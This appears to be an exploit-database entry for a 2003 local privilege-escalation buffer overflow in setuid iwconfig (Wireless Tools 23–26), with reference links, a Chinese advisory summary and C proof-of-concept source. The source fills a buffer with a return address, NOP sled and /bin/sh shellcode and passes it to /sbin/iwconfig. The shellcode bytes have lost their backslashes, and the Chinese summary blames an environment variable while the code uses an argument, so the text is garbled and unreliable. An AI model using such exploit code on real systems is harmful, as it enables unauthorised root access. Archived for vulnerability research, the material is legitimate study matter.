https://www.exploit-db.com/exploits/23301
https://www.securityfocus.com/bid/82721
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-041

iwconfig存在缓冲区溢出漏洞。当安装setuid时，本地用户借助超长OUT环境变量执行任意代码。

source: http://www.securityfocus.com/bid/8901/info
  
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com
 */

/*
 * Greetz to Mixter,gorny,rave..
 */

/*
 * Description:
 *              iwconfig configures a wireless network interface and is similar to ifconfig
 *  except that iwconfig configures wireless interfaces.
 * Vulnerability:
 *               Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...
 */

/*
 * Yet another Proof Of Concept Xploit for 'iwconfig'
 */


#include <stdio.h>
#include <stdlib.h>

#define BUFF_SIZE 98
#define RET 0xbffffc3f

char shellcode[]=
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";

int main(int argc,char **argv)
{

  int i;
  char *buff=(char *)malloc(sizeof(char)*BUFF_SIZE);

  for(i=0;i<BUFF_SIZE;i+=4)
    *(long *)&buff[i]=RET;

  for(i=0;i<BUFF_SIZE-strlen(shellcode)-12;i++)
    *(buff+i)=0x90;

  memcpy(buff+i,shellcode,strlen(shellcode));

  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);

  return 0;
}

Wireless Tools For Linux Wireless Tools Version 26

Wireless Tools For Linux Wireless Tools Version 25

Wireless Tools For Linux Wireless Tools Version 24

Wireless Tools For Linux Wireless Tools Version 23

来源:BUGTRAQ
名称:20031112iwconfigvulnerability-thelastcodewasdemagedsendingbyemail
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=106867458902521&w;=2